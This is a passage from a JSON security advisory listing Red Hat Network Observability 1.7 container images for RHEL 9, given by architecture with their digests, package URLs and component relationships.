"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_id": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_id": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
